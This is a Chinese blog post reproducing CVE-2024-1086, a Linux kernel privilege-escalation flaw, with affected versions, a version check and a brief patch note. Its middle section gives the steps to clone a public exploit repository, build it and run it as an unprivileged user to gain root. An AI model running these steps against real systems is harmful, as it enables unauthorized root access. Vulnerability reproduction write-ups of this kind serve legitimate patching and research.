当前位置:   article > 正文

【漏洞复现】(CVE-2024-1086)Linux内核中提权漏洞CVE-2024-1086_linux kernel 权限提升漏洞(cve-2024-1086)

linux kernel 权限提升漏洞(cve-2024-1086)

## 影响范围

以下版本的Linux内核受该漏洞影响:
- 3.15 <= Linux kernel < 6.1.76
- 5.2 <= Linux kernel < 6.6.15
- 6.7 <= Linux kernel < 6.7.3
- 6.8:rc1 = Linux kernel

该漏洞不适用于内核配置 `CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y` 且 Linux 内核版本 > 6.4 的系统。

## 检查是否受漏洞影响

### 1. 检查当前Linux内核版本

在终端运行以下命令,查看当前内核版本:
uname -a

该漏洞影响了使用Linux内核版本v5.14 - v6.6 版本(不包括分支修补版本 v5.15.149、v6.1.76和v6.6.15)的大多数 Linux系统/内核,包括CentOS、Debian、Ubuntu和 KernelCTF等

基本上2023前或者2023的都存在

漏洞利用

切换成普通用户一步步来就可以

su 用户名字

  1. #拉取项目并编译
  2. git clone https://github.com/Notselwyn/CVE-2024-1086
  3. cd CVE-2024-1086
  4. make
  5. #然后运行
  6. ./exploit

make不一定要全部成功只要生成exploit就可以

我这里下载好了

直接执行就可以了

./exploit

可以看到执行id命令后

漏洞修复

更新Linux内核

根据不同的Linux发行版,采取相应的内核更新步骤。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/喵喵爱编程/article/detail/1012512
推荐阅读
相关标签
  

闽ICP备14008679号